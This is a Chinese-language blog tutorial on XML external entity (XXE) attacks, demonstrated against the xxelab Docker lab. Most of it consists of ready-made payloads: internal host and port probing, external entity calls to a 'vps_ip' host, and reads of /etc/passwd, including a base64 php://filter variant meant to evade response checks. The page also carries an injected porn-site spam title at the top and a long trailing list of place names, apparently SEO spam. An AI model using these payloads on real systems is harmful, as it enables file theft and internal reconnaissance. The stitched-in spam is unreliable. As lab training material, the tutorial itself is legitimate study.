91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

利用xxe獲取linux系統的passwd

發布時間:2020-02-28 11:06:15 來源:網絡 閱讀:602 作者:hack_man 欄目:安全技術

引用外部DTD文件訪問內網主機/端口。

<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看響應時間)

引用外部DTD文件訪問wai網。

<!DOCTYPE a SYSTEM "http://vps_ip" >

引用內部實體。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部實體讀本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部實體訪問內wang主機端口。

<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看響應時間)

外部實體訪問wai網。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下載rrodrigo/xxelab該鏡像

啟動:docker run -d -p 8082:80 rrodrigo/xxelab

利用xxe獲取linux系統的passwd

抓取注冊包,發現采用xml格式傳遞,且郵箱有返回:

利用xxe獲取linux系統的passwd

將返回內容處進行xxe回顯設置讀取/etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>

利用xxe獲取linux系統的passwd

利用base64編碼進行xxe,防止有返回包驗證

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>

利用xxe獲取linux系統的passwd
返回base64數據包,base64解碼

利用xxe獲取linux系統的passwd

向AI問一下細節
推薦閱讀:
  1. passwd命令
  2. xxe hacking

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

舟曲县| 墨脱县| 兴和县| 通海县| 车险| 甘洛县| 泌阳县| 三门县| 克什克腾旗| 武汉市| 邢台县| 郯城县| 清涧县| 康乐县| 香港| 临湘市| 凭祥市| 太原市| 五寨县| 敖汉旗| 赤峰市| 灵丘县| 新疆| 章丘市| 余江县| 武陟县| 昌邑市| 海口市| 蕲春县| 凌源市| 南投县| 芷江| 汉寿县| 五大连池市| 龙南县| 天镇县| 从化市| 庆安县| 镇远县| 夏津县| 湄潭县|